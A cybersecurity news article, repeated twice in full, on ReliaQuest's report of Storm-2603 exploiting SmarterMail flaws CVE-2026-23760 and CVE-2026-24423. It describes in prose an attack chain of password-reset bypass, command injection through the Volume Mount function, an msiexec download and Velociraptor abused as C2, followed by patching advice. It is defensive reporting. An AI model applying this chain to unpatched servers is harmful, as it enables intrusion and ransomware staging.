SmarterMail + Storm-2603 = a recipe for cyber doomsday for corporations.
ReliaQuest has detected a wave of hacks targeting SmarterMail, the email platform from SmarterTools. The breach is occurring through vulnerability CVE-2026-23760. Based on technical characteristics, researchers attribute this activity with a moderately high probability to the Storm-2603 group , which originates in China. The observed chain of actions clearly demonstrates for the first time that this vulnerability is being used as an entry point before launching the Warlock ransomware .
A vulnerability in SmarterMail allows authentication to be bypassed and a new administrator password assigned via the password reset API . Normally, the mechanism is required to verify the previous access code before changing it. In builds prior to version 9511, this check is not performed. The node accepts any entered value as valid. As a result, an unauthorized user can overwrite the credentials of a desired profile, even without knowing the current password, and gain maximum privileges in the control panel.
Simply logging into the mail console doesn't necessarily mean executing instructions in the operating system. In the analyzed cases, the attackers proceed to the second step and use the Volume Mount administrative function. This tool is used to connect network storage devices and accepts a mount string. The program doesn't restrict the contents of this parameter. Arbitrary commands are substituted for the default values. Processing is performed with SmarterMail service privileges, effectively transferring control of the Windows host to the attacker. This technique transforms interface access into remote code execution and paves the way for the download of malicious modules.
The subsequent actions are consistent with techniques ReliaQuest previously observed in Storm-2603 operations. The standard Windows installer msiexec is used to deliver the payload. It then downloads the v4.msi MSI package from the Supabase cloud platform. In the recorded cases, the legitimate MailService.exe process launched cmd.exe, which then performed the download. From the outside, this appears to be normal mail service activity. In previous Warlock episodes, similar files were hosted on GitHub. Researchers believe the new hosting is an attempt to bypass previous blocking and signatures.
The received packet installs Velociraptor, a well-known digital forensics and incident response tool used by security teams. In this operation, it is used as a command and control channel to the victim host, essentially acting as a C2. Due to its legitimate status, this agent is less likely to alert security systems and helps maintain a hidden presence for longer. In this case, the encryption program was not delivered to the network, but the entire preparatory sequence is identical to the previously described Warlock scenarios. According to ReliaQuest, the intrusion was stopped early.
At the same time, analysts noticed attempts to exploit a second platform vulnerability, CVE-2026-24423 . CISA issued an advisory on this issue on February 5, 2026, citing interest from ransomware operators. Logs showed calls to the ConnectToHub API consistent with this flaw. The sources of the requests did not match the Storm-2603 infrastructure. Possible explanations include a change in the group's addresses, the work of other actors, or automated scanning.
Both vulnerabilities lead to similar results but use different paths. CVE-2026-23760 grants administrative privileges without logging in via the password change procedure, after which the attacker manually activates standard capabilities and executes commands. CVE-2026-24423 , according to the researchers, provides a shorter path to executing instructions via the API. The analyzed incident recorded password change events, clearly indicating successful exploitation of the first approach. The second approach only reveals API calls without confirmed penetration.
According to ReliaQuest, internet-accessible mail servers are currently being extensively tested using various methods. Fixing one vulnerability doesn't guarantee protection if the attacker has already penetrated through another method or is using legitimate administrative tools for a hidden presence. Similar tactics are used in intrusions through VPN gateways and file transfer services. First, an external service is compromised, then movement across the network begins using standard tools without much obvious malicious code.
ReliaQuest recommends urgently updating all SmarterMail instances to build 9511 or later, which fixes the password verification bug, and installing patches for CVE-2026-24423. An additional measure is to move the mail host to a separate network segment to prevent a compromise from directly accessing the domain controller and critical systems. Strict outbound traffic rules are also helpful. Such a server should only allow essential protocols, such as SMTP, IMAP, and POP3, while blocking all other external connections, especially to cloud servers and unknown addresses. This restricts control and payload delivery channels.
ReliaQuest has detected a wave of hacks targeting SmarterMail, the email platform from SmarterTools. The breach is occurring through vulnerability CVE-2026-23760. Based on technical characteristics, researchers attribute this activity with a moderately high probability to the Storm-2603 group , which originates in China. The observed chain of actions clearly demonstrates for the first time that this vulnerability is being used as an entry point before launching the Warlock ransomware .
A vulnerability in SmarterMail allows authentication to be bypassed and a new administrator password assigned via the password reset API . Normally, the mechanism is required to verify the previous access code before changing it. In builds prior to version 9511, this check is not performed. The node accepts any entered value as valid. As a result, an unauthorized user can overwrite the credentials of a desired profile, even without knowing the current password, and gain maximum privileges in the control panel.
Simply logging into the mail console doesn't necessarily mean executing instructions in the operating system. In the analyzed cases, the attackers proceed to the second step and use the Volume Mount administrative function. This tool is used to connect network storage devices and accepts a mount string. The program doesn't restrict the contents of this parameter. Arbitrary commands are substituted for the default values. Processing is performed with SmarterMail service privileges, effectively transferring control of the Windows host to the attacker. This technique transforms interface access into remote code execution and paves the way for the download of malicious modules.
The subsequent actions are consistent with techniques ReliaQuest previously observed in Storm-2603 operations. The standard Windows installer msiexec is used to deliver the payload. It then downloads the v4.msi MSI package from the Supabase cloud platform. In the recorded cases, the legitimate MailService.exe process launched cmd.exe, which then performed the download. From the outside, this appears to be normal mail service activity. In previous Warlock episodes, similar files were hosted on GitHub. Researchers believe the new hosting is an attempt to bypass previous blocking and signatures.
The received packet installs Velociraptor, a well-known digital forensics and incident response tool used by security teams. In this operation, it is used as a command and control channel to the victim host, essentially acting as a C2. Due to its legitimate status, this agent is less likely to alert security systems and helps maintain a hidden presence for longer. In this case, the encryption program was not delivered to the network, but the entire preparatory sequence is identical to the previously described Warlock scenarios. According to ReliaQuest, the intrusion was stopped early.
At the same time, analysts noticed attempts to exploit a second platform vulnerability, CVE-2026-24423 . CISA issued an advisory on this issue on February 5, 2026, citing interest from ransomware operators. Logs showed calls to the ConnectToHub API consistent with this flaw. The sources of the requests did not match the Storm-2603 infrastructure. Possible explanations include a change in the group's addresses, the work of other actors, or automated scanning.
Both vulnerabilities lead to similar results but use different paths. CVE-2026-23760 grants administrative privileges without logging in via the password change procedure, after which the attacker manually activates standard capabilities and executes commands. CVE-2026-24423 , according to the researchers, provides a shorter path to executing instructions via the API. The analyzed incident recorded password change events, clearly indicating successful exploitation of the first approach. The second approach only reveals API calls without confirmed penetration.
According to ReliaQuest, internet-accessible mail servers are currently being extensively tested using various methods. Fixing one vulnerability doesn't guarantee protection if the attacker has already penetrated through another method or is using legitimate administrative tools for a hidden presence. Similar tactics are used in intrusions through VPN gateways and file transfer services. First, an external service is compromised, then movement across the network begins using standard tools without much obvious malicious code.
ReliaQuest recommends urgently updating all SmarterMail instances to build 9511 or later, which fixes the password verification bug, and installing patches for CVE-2026-24423. An additional measure is to move the mail host to a separate network segment to prevent a compromise from directly accessing the domain controller and critical systems. Strict outbound traffic rules are also helpful. Such a server should only allow essential protocols, such as SMTP, IMAP, and POP3, while blocking all other external connections, especially to cloud servers and unknown addresses. This restricts control and payload delivery channels.
